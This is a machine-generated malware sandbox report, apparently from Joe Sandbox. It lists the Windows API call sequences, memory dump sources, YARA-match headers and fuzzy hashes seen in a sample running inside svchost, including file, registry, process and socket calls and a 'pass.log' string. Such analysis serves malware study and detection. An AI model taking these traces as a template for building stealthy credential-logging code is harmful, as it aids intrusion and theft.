                                                                                                                                                                                                                    • API ID: Window$Rect$EmptyLongParentPoints
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 379166938-0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: callocexitfree
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3367576030-0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetAncestor.USER32(00000000,00000002,?,00000000), ref: 02C81ACE
                                                                                                                                                                                                                    • GetWindowTextA.USER32(00000000,?,00000104), ref: 02C81AE9
                                                                                                                                                                                                                      • Part of subcall function 02C81330: memset.MSVCRT ref: 02C81347
                                                                                                                                                                                                                      • Part of subcall function 02C81330: SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,?,7622F550,00000000), ref: 02C8135E
                                                                                                                                                                                                                      • Part of subcall function 02C81330: PathAddBackslashA.SHLWAPI(?,?,7622F550,00000000), ref: 02C8136B
                                                                                                                                                                                                                      • Part of subcall function 02C81330: PathFileExistsA.SHLWAPI(?,?,7622F550,00000000), ref: 02C813A7
                                                                                                                                                                                                                      • Part of subcall function 02C81330: lstrcpynA.KERNEL32(02CC7C28,00000000,00000104,00000000,00000001,?,7622F550,00000000), ref: 02C813D1
                                                                                                                                                                                                                      • Part of subcall function 02C81330: GetProcessHeap.KERNEL32(00000000,00000000,?,7622F550,00000000), ref: 02C813E0
                                                                                                                                                                                                                      • Part of subcall function 02C81330: HeapValidate.KERNEL32(00000000,?,7622F550,00000000), ref: 02C813E3
                                                                                                                                                                                                                      • Part of subcall function 02C81330: GetProcessHeap.KERNEL32(00000000,00000000,?,7622F550,00000000), ref: 02C813F0
                                                                                                                                                                                                                      • Part of subcall function 02C81330: HeapFree.KERNEL32(00000000,?,7622F550,00000000), ref: 02C813F3
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C81B47
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 02C81B4A
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C81B57
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 02C81B5A
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Heap$Process$Path$FreeValidate$AncestorBackslashExistsFileFolderTextWindowlstrcpynmemset
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 649337724-0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,0006AFB0,00000000,00000000,00000000,?,02C97874,00000000,00140B17), ref: 02C973D5
                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,02C97874,00000000,00140B17), ref: 02C973DC
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C973EF
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,02C97870,?,02C97874,00000000,00140B17), ref: 02C9749E
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000,?,02C97874,00000000,00140B17), ref: 02C974A1
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,?,02C97874,00000000,00140B17), ref: 02C974AD
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?,02C97874,00000000,00140B17), ref: 02C974B0
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Heap$Process$AllocFreeValidatememset
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 470506929-0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7F1BFC6B), ref: 02C89B47
                                                                                                                                                                                                                    • GetFileAttributesA.KERNEL32(?), ref: 02C89B85
                                                                                                                                                                                                                    • PathFileExistsA.SHLWAPI(?), ref: 02C89BC9
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FilePath$AttributesBackslashExists
                                                                                                                                                                                                                    • String ID: 7F1BFC6B$pass.log
                                                                                                                                                                                                                    • API String ID: 2713433229-624231546
                                                                                                                                                                                                                    • Opcode ID: 78619ef695ab782b7263028e11ce17cc6bd4f0f8d27fa45550990d259e2171eb
                                                                                                                                                                                                                    • Instruction ID: dd6b5d5ff430268dd9c764518b0ef113d75c22a133e28c216694d89d03cf3145
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 78619ef695ab782b7263028e11ce17cc6bd4f0f8d27fa45550990d259e2171eb
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 691127319046484BD7229B28A8A47F7BBE4EFC6301F14C6E4ECCAD7301EA30DA59C780
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 02C76570: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,?,02C86BCC,?,00000000), ref: 02C76596
                                                                                                                                                                                                                      • Part of subcall function 02C76570: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,02C86BCC,?,00000000), ref: 02C765B7
                                                                                                                                                                                                                      • Part of subcall function 02C76570: GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,02C86BCC,?,00000000), ref: 02C765DD
                                                                                                                                                                                                                      • Part of subcall function 02C76570: RtlAllocateHeap.NTDLL(00000000,?,?,?,?,?,02C86BCC,?,00000000), ref: 02C765E4
                                                                                                                                                                                                                      • Part of subcall function 02C76570: memset.MSVCRT ref: 02C765F4
                                                                                                                                                                                                                      • Part of subcall function 02C76570: ReadFile.KERNEL32(00000000,00000000,?,00000000,00000000,?,?,?,?,?,02C86BCC,?), ref: 02C76616
                                                                                                                                                                                                                      • Part of subcall function 02C76570: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,02C86BCC,?), ref: 02C76622
                                                                                                                                                                                                                      • Part of subcall function 02C76570: HeapValidate.KERNEL32(00000000,?,?,?,?,?,02C86BCC,?), ref: 02C76629
                                                                                                                                                                                                                      • Part of subcall function 02C76570: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,02C86BCC,?), ref: 02C76636
                                                                                                                                                                                                                      • Part of subcall function 02C76570: HeapFree.KERNEL32(00000000,?,?,?,?,?,02C86BCC,?), ref: 02C7663D
                                                                                                                                                                                                                      • Part of subcall function 02C76570: GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C7665D
                                                                                                                                                                                                                      • Part of subcall function 02C76570: CloseHandle.KERNEL32(00000000), ref: 02C7666E
                                                                                                                                                                                                                      • Part of subcall function 02C76570: IsBadWritePtr.KERNEL32(?,00000004), ref: 02C7667E
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000013,?,00000000,00000000,00000000,75AF5CE0,02C82897), ref: 02C7696C
                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 02C76973
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C76983
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,75AF5CE0,02C82897), ref: 02C769A5
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 02C769A8
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C769B5
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 02C769B8
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Heap$Process$File$FreeHandleValidatememset$AllocAllocateCloseCreateInformationReadSizeWrite
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1057660858-0
                                                                                                                                                                                                                    • Opcode ID: f377347343ddea82a5b582f989365a99ecd9eccaf66547f3de79fc0db7b6716e
                                                                                                                                                                                                                    • Instruction ID: 58932f77280adc2f93b47e823172b600c7e8a6d5802ac6a8ee26dcbea9958889
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f377347343ddea82a5b582f989365a99ecd9eccaf66547f3de79fc0db7b6716e
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5511E572F41658A7C725ABA5AC48F9BB76CDFC0B55F140168B909D7280DB70DE14CBE0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 02C92F00: OpenProcess.KERNEL32(00000000,00001400,00000000,00000000,7734FFB0,?,?,?,?,?,?,02C86436,?,00000000), ref: 02C92F2C
                                                                                                                                                                                                                      • Part of subcall function 02C92F00: GetProcessTimes.KERNEL32(00000000,02C86436,?,?,?,?,?,?,?,?,?,02C86436,?,00000000), ref: 02C92F4A
                                                                                                                                                                                                                      • Part of subcall function 02C92F00: GetHandleInformation.KERNEL32(00000000,?,?,?,?,?,?,?,02C86436,?,00000000), ref: 02C92F68
                                                                                                                                                                                                                      • Part of subcall function 02C92F00: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,02C86436,?,00000000), ref: 02C92F79
                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(02CBD8A0,?,00000000,00000000,02C865A8), ref: 02C862F9
                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(02CBD8A0), ref: 02C86315
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,092F3178), ref: 02C8633A
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 02C8633D
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,092F3178), ref: 02C8634A
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 02C8634D
                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(02CBD8A0), ref: 02C86358
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: HeapProcess$CriticalSection$HandleLeave$CloseEnterFreeInformationOpenTimesValidate
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3901171168-0
                                                                                                                                                                                                                    • Opcode ID: 26c6d85392eb8c4a16e942620162100858da66d781d82b7ac1ffba0ce0e35a5f
                                                                                                                                                                                                                    • Instruction ID: e16848d6b56a16331ab7f53f00c9a1bda535184f7d0ec46107e6b32ba09f805d
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 26c6d85392eb8c4a16e942620162100858da66d781d82b7ac1ffba0ce0e35a5f
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8D01D832F44310A7DB217FA6F848B5A779CDFC4B56F244969E646C7240C7715414CBD0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • malloc.MSVCRT ref: 02C9A909
                                                                                                                                                                                                                      • Part of subcall function 02C9F0F0: __WSAFDIsSet.WS2_32(?,?), ref: 02C9F1A0
                                                                                                                                                                                                                      • Part of subcall function 02C9F0F0: closesocket.WS2_32(?), ref: 02C9F1BD
                                                                                                                                                                                                                    • realloc.MSVCRT ref: 02C9A915
                                                                                                                                                                                                                    • malloc.MSVCRT ref: 02C9A94D
                                                                                                                                                                                                                    • realloc.MSVCRT ref: 02C9A959
                                                                                                                                                                                                                    • malloc.MSVCRT ref: 02C9A9AC
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: malloc$realloc$closesocket
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3133911991-0
                                                                                                                                                                                                                    • Opcode ID: 0356a3c1231401b6a7be1d7f5de1c8159a5ac392767ba78456acf3909ac10746
                                                                                                                                                                                                                    • Instruction ID: 234d781074eed9ee82bdb69a372c02d58ebd33085692b2bbe08d611481305c46
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0356a3c1231401b6a7be1d7f5de1c8159a5ac392767ba78456acf3909ac10746
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BD91B471E006468FCF04CF69DD94BEA37A6FF84305F1985B9ED099B346D634AA11CBA0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02C83079
                                                                                                                                                                                                                    • VirtualQuery.KERNEL32(02C93910,?,0000001C), ref: 02C830AC
                                                                                                                                                                                                                    • VirtualQuery.KERNEL32(02C93910,?,0000001C), ref: 02C830D8
                                                                                                                                                                                                                    • VirtualQuery.KERNEL32(02C93910,?,0000001C), ref: 02C830FF
                                                                                                                                                                                                                    • SetLastError.KERNEL32(?), ref: 02C8317D
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: QueryVirtual$ErrorLast
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2886163261-0
                                                                                                                                                                                                                    • Opcode ID: fff302ee3b30c264ee0b45909c7ee0650ba2af0419d9d1cd90c9113fc6f59942
                                                                                                                                                                                                                    • Instruction ID: c22fec3debad68109ae53af3713d6f3bc022abe314a829566c38cd502efa383c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fff302ee3b30c264ee0b45909c7ee0650ba2af0419d9d1cd90c9113fc6f59942
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6C410070D002589FDB10DFA8DC84ABEBBF5EB49B14F14856AE854E7300D7749A41CF90
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02C82E19
                                                                                                                                                                                                                    • VirtualQuery.KERNEL32(Function_00023910,?,0000001C), ref: 02C82E4C
                                                                                                                                                                                                                    • VirtualQuery.KERNEL32(Function_00023910,?,0000001C), ref: 02C82E78
                                                                                                                                                                                                                    • VirtualQuery.KERNEL32(Function_00023910,?,0000001C), ref: 02C82E9F
                                                                                                                                                                                                                    • SetLastError.KERNEL32(?), ref: 02C82F1D
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: QueryVirtual$ErrorLast
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2886163261-0
                                                                                                                                                                                                                    • Opcode ID: 12f742ba83e8cffd235c606aaf56fba24025ccdf7a34fec089671cba5c95c871
                                                                                                                                                                                                                    • Instruction ID: 3d0eeb836fa8633fc1b3138ef879ea6f560b6d7889179de6900c53933034e2cc
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 12f742ba83e8cffd235c606aaf56fba24025ccdf7a34fec089671cba5c95c871
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FA414071D00258AFDB10DFA8D888AAEBBF5FF48314F50856AE809E7200D3749A41CF91
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02C713EE
                                                                                                                                                                                                                    • VirtualQuery.KERNEL32(Function_00023910,?,0000001C), ref: 02C7142A
                                                                                                                                                                                                                    • VirtualQuery.KERNEL32(Function_00023910,?,0000001C), ref: 02C71456
                                                                                                                                                                                                                    • VirtualQuery.KERNEL32(Function_00023910,?,0000001C), ref: 02C7147D
                                                                                                                                                                                                                    • SetLastError.KERNEL32(?), ref: 02C714A8
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: QueryVirtual$ErrorLast
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2886163261-0
                                                                                                                                                                                                                    • Opcode ID: 2384ea9097a833b24d5b8108a4602d841b8cc338c89f456d74cb20a2ae7ef3d8
                                                                                                                                                                                                                    • Instruction ID: 1d0cbe58a42e6112b8ddfa8b43695c8949b580d3d940c60503325a504768526f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2384ea9097a833b24d5b8108a4602d841b8cc338c89f456d74cb20a2ae7ef3d8
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C531BFB1D10209AFDB40DFA8D885AEE7BF9FB4C310F11856AE919E7240E37499418F90
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • WSAGetLastError.WS2_32 ref: 02C88212
                                                                                                                                                                                                                    • VirtualQuery.KERNEL32(02C93910,?,0000001C), ref: 02C88243
                                                                                                                                                                                                                    • VirtualQuery.KERNEL32(02C93910,?,0000001C), ref: 02C8826F
                                                                                                                                                                                                                    • VirtualQuery.KERNEL32(02C93910,?,0000001C), ref: 02C88296
                                                                                                                                                                                                                    • WSASetLastError.WS2_32(?), ref: 02C882C9
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: QueryVirtual$ErrorLast
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2886163261-0
                                                                                                                                                                                                                    • Opcode ID: b819b516573bc4f912785a3247e2323c5e7f75cb7350b74a62e991f6c2d5373a
                                                                                                                                                                                                                    • Instruction ID: 06586e1eaa10fa555cb0fbba212fe2088047078a4de0b2aeeb16aef29d23f064
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b819b516573bc4f912785a3247e2323c5e7f75cb7350b74a62e991f6c2d5373a
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6B31B8B5D0020CAFDB40DFA9D984AEEBBF5FB48304F11856AE914E7200E7749A40CFA1
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetFileType.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,02C97604), ref: 02C97163
                                                                                                                                                                                                                    • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,0000002C,00000044,00000030,0000003C,?,?,?,?,?,?,?,02C97604), ref: 02C9718B
                                                                                                                                                                                                                    • GetLocalTime.KERNEL32(?,?,?,?,?,?,?,?,02C97604), ref: 02C971B5
                                                                                                                                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,02C97604), ref: 02C971C3
                                                                                                                                                                                                                    • FileTimeToDosDateTime.KERNEL32(?,02C97604,?), ref: 02C971D5
                                                                                                                                                                                                                      • Part of subcall function 02C96C70: GetFileType.KERNEL32(?,00000000,00000000), ref: 02C96C79
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FileTime$Type$DateLocalPointerSystem
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 60630809-0
                                                                                                                                                                                                                    • Opcode ID: 518137f2a91d0527747787b4f28273167a0e4f474879d59b772cf3842829abf8
                                                                                                                                                                                                                    • Instruction ID: d1af3c16b96baf0a17358377f1a509a5044f62bde0d5554f7e539b76d6eef2d2
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 518137f2a91d0527747787b4f28273167a0e4f474879d59b772cf3842829abf8
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8B2171B29017449FC721CF6AD9C49ABFBFCFB88214B500A6EE59AC3940D771E508CB20
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000001,02C822AB,00000000,00010108,?,00000000), ref: 02C936DF
                                                                                                                                                                                                                    • RegEnumKeyExA.ADVAPI32(?,00000000,?,80000001,00000000,00000000,00000000,00000000,00000000), ref: 02C93714
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 02C9373E
                                                                                                                                                                                                                    • RegDeleteKeyA.ADVAPI32(00000104,02C822AB), ref: 02C93756
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 02C93762
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Close$DeleteEnumOpen
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1912718029-0
                                                                                                                                                                                                                    • Opcode ID: a22b862fa647e953029aae80ff2f96f161f4a9ea18174d0d1adeba07f20360f8
                                                                                                                                                                                                                    • Instruction ID: 7fb592411c16b9625478df549eae7303d651cc39d5f0bd80f854c0c5892efd56
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a22b862fa647e953029aae80ff2f96f161f4a9ea18174d0d1adeba07f20360f8
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0A217476E40158ABDB21DA58DC48FEAB7ACEF85B10F1082D5FD44EB240D7B1AE548BD0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: free$exitmallocmemcpy
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2377537114-0
                                                                                                                                                                                                                    • Opcode ID: 8395759df2680560837155c9172614cfa67c7f3d6aaca21d69cc930b074bc6fd
                                                                                                                                                                                                                    • Instruction ID: c08f22b8a041d20cf0afc80c082c48cf2a026f55f6d974c7d19bec6c713f0404
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8395759df2680560837155c9172614cfa67c7f3d6aaca21d69cc930b074bc6fd
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E52190B1A0024AAFC714CF59E480B6ABBF5FF89304F14892CD98EC7300E771A661CB85
                                                                                                                                                                                                                    APIs
